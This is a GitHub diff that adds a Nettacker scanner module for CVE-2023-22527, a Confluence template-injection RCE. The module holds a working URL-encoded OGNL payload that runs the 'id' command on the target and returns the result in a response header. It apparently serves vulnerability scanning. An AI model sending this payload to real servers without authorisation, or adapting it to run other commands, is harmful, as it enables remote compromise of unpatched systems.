File tree Expand file tree Collapse file tree 1 file changed +50
-0
lines changed Expand file tree Collapse file tree 1 file changed +50
-0
lines changed Original file line number Diff line number Diff line change 1+ info :
2+ name : confluence_cve_2023_22527_vuln
3+ author : Jimmy Ly
4+ severity : 10
5+ description : A template injection vulnerability on out-of-date versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected version.
6+ reference :
7+ - https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html
8+ - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
9+ - https://nvd.nist.gov/vuln/detail/CVE-2023-22527
10+ profiles :
11+ - vuln
12+ - vulnerability
13+ - http
14+ - critical_severity
15+ - cve
16+ - confluence
17+ - atlassian
18+
19+ payloads :
20+ - library : http
21+ steps :
22+ - method : post
23+ timeout : 3
24+ headers :
25+ User-Agent : " {user_agent}"
26+ Accept-Encoding : gzip, deflate, br
27+ Content-Type : application/x-www-form-urlencoded
28+ allow_redirects : false
29+ ssl : false
30+ url :
31+ nettacker_fuzzer :
32+ input_format : " {{schema}}://{target}:{{ports}}/template/aui/text-inline.vm"
33+ prefix : " "
34+ suffix : " "
35+ interceptors :
36+ data :
37+ schema :
38+ - " http"
39+ - " https"
40+ ports :
41+ - 80
42+ - 443
43+ data : label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.x%5B0%5D%2C%7B%7D%29%2B%5Cu0027&x=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027X-Cmd-Response%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22id%22%7D%29%29
44+ response :
45+ condition_type : and
46+ conditions :
47+ headers :
48+ X-Cmd-Response :
49+ regex : (.+)$
50+ reverse : false
You can’t perform that action at this time.
0 commit comments